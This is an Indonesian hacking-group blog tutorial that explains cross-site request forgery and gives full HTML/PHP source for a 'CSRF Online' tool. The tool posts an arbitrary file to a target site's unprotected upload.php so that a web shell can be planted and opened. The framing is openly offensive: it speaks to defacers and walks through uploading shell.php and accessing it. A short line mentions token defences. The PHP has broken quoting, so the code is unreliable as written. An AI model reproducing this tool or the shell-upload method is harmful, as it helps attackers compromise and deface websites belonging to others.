Tutorial Cara Membuat Tools CSRF Online Beserta Penjelasannya !!!

Hello Mates 🍻 !!!

By : Mr.Kla

Hello Mates ! Welcome Back !

Wah pasti sudah kalian nanti – nanti nih artikel yang satu ini hwhw :v. Baik, kali ini saya akan memberikan Tutorial dan Penjelasan CSRF Online.

Para defacer tentunya sering menggunakan exploit CSRF ini. Terutama CSRF upload dan XSS. CSRF sendiri singkatan dari Cross Site
Request Forgery. Serangan jenis ini umumnya menggunakan exploit yg dibuat
oleh penyerang untuk mengirimkan request yg akan di terima web target
(Umumnya exploit ditulis dalam bahasa markup HTML).

Loh…maksudnya gimana?
Nah contoh sederhananya gini:

Ada seseorang yg mengirim dan memberikannya kepada seorang
pemilik rumah melalui kurir. Nah kebetulan si kurir ini tidak menanyakan
apa isi paket itu dan nama atau alamat pengirim,jadi langsung aja dia
kirim. Ternyata isi paket itu adalah bom dan…ya gitu lah :”‘v

Jadi klo dipikirin lagi gini:

<form action=”upload.php” method=”post”>
Itu adalah isi dari halaman upload yg hanya bisa diakses admin.Nah kebetulan upload.php nya bisa diakses siapa saja.
Misalnya : www.webtarget.co.li/csrf/upload.php

Anggap aja kita mengupload shell dan kebetulan csrf yg
rentan ternyata dipakai admin untuk mengupload gambar.Setelah liat liat
website target dan membuka url dari gambar yg ada,ternyata semua gambar
hasil upload disimpan di /images/web/

Nah tinggal akses aja /images/web/shell.php

Dan… akan masuk dah

Loh kan dalam html setiap form ada namanya di input type dan name yg berbeda?
Nah ini biasanya pekerjaan para pencari bug…. Umumnya mereka melakukan
view source (inspect element) atau bahkan mendownload langsung cms yg
bersangkutan apabila halaman yg mengandung nama input dilindungi
autentikasi yg sulit ditembus.

Bukan hanya file upload,bisa saja fitur posting artikel
rentan csrf. Cuma disini input type nya bukan file tapi text. Penyerang
dapat mengirimkan request berisi script html/javascript jahat. Bisa saja
serangan JS Overlay terjadi atau bahkan yg parah hingga pencurian
cookie.

Solusi?

Solusi bisa menggunakan method POST karena lebih
aman atau gunakan token yg di generate secara random dan berkala untuk
menghindari request yg tidak sah.

Oke Lads !! Kita langsung keTutorial Ngoding nya !

<!– ANGELS CYBER MOON NIHH BOSSS –>
<html>
<head>
<title>CSRF Online Angels Cyber Moon</title>
<link rel=”icon” href=”https://angelscybermoon.blogspot.com/2020/11/logo1.png”>
<link href=”https://fonts.googleapis.com/css?family=PT+Sans+Narrow|Just+Another+Hand” rel=”stylesheet”>
<link href=”http://fonts.googleapis.com/css?family=Ubuntu+Mono:400,700″ rel=”stylesheet” type=”text/css”>

<!– Meta Data –>
<meta content=”CSRF Online Angels Cyber Moon” name=”title”>
<meta content=”CSRF Online Angels Cyber Moon” name=”description”>
<meta content=”CSRF Online” name=”keywords”>
<meta content=”CSRF Online” name=”Abstract”>
<!– Akhir Meta Dta –>

<!– Body –>
<body bgcolor=”black”>

<!– Style Css –>
<style>

@keyframes shake {

0% { transform: translate(1px, 1px) rotate(0deg); }

10% { transform: translate(-1px, -2px) rotate(-1deg); }

20% { transform: translate(-3px, 0px) rotate(1deg); }

30% { transform: translate(3px, 2px) rotate(0deg); }

40% { transform: translate(1px, -1px) rotate(1deg); }

50% { transform: translate(-1px, 2px) rotate(-1deg); }

60% { transform: translate(-3px, 1px) rotate(0deg); }

70% { transform: translate(3px, 1px) rotate(-1deg); }

80% { transform: translate(-1px, -1px) rotate(1deg); }

90% { transform: translate(1px, 2px) rotate(0deg); }

100% { transform: translate(1px, -2px) rotate(-1deg); }

}

.x{

animation: shake 1s;

animation-iteration-count: infinite;

font-family: ‘Just Another Hand’, cursive;

font-size:58px;

color: white;

}

.z{

font-family: ‘PT Sans Narrow’, cursive;

font-size:20px;
color: white;
}

</style>
<!– Akhir Style –>
<center>
<div class=”x”>Welcome To CSRF Angels Cyber Moon</div>
<div class=”z”>

<marquee width=”55%” direction=”right” behavior=”alternate” scrollamount=”20″>$ Angels Cyber Moon – Indonesian Security Down – IndoAngelSec $</marquee>
</div>
<br><br>
<img src=”https://angelscybermoon.blogspot.com/2020/11/logo.png” width=”250″ alt=””>

<!– Post Data –>
<form method=”post”>
<font size=”6″ color=”white” face=”arial” style=”text-shadow: 1px 0px 5px red;”>
URL: <input type=”text” name=”url” size=”50″ height=”10″ placeholder=”http://www.target.com/[path]/upload.php” style=”margin: 5px auto; padding-left: 5px;” required><br>
POST File: <font color=”white”> <input type=”text” name=”pf” size=”50″ height=”10″ placeholder=”Filedata / files[] / qqfile / userfile / dll” style=”margin: 5px auto; padding-left: 5px;” required><br></font>
<input type=”submit” name=”d” value=”Kunci Target!!!”>
</form>
<?php
$url = $_POST[‘url’];
$pf = $_POST[‘pf’];
$d = $_POST[‘d’];
if($d) {
echo “<form method=’post’ target=”_blank” action=’$url’ enctype=”multipart/form-data”><input type=”file” name=”$pf”><input type=”submit” name=”g” value=”Genjot cuks!”></form”;
}
?>
</form>
</center>
<!– Akhir Post Data –>
</body>
</html>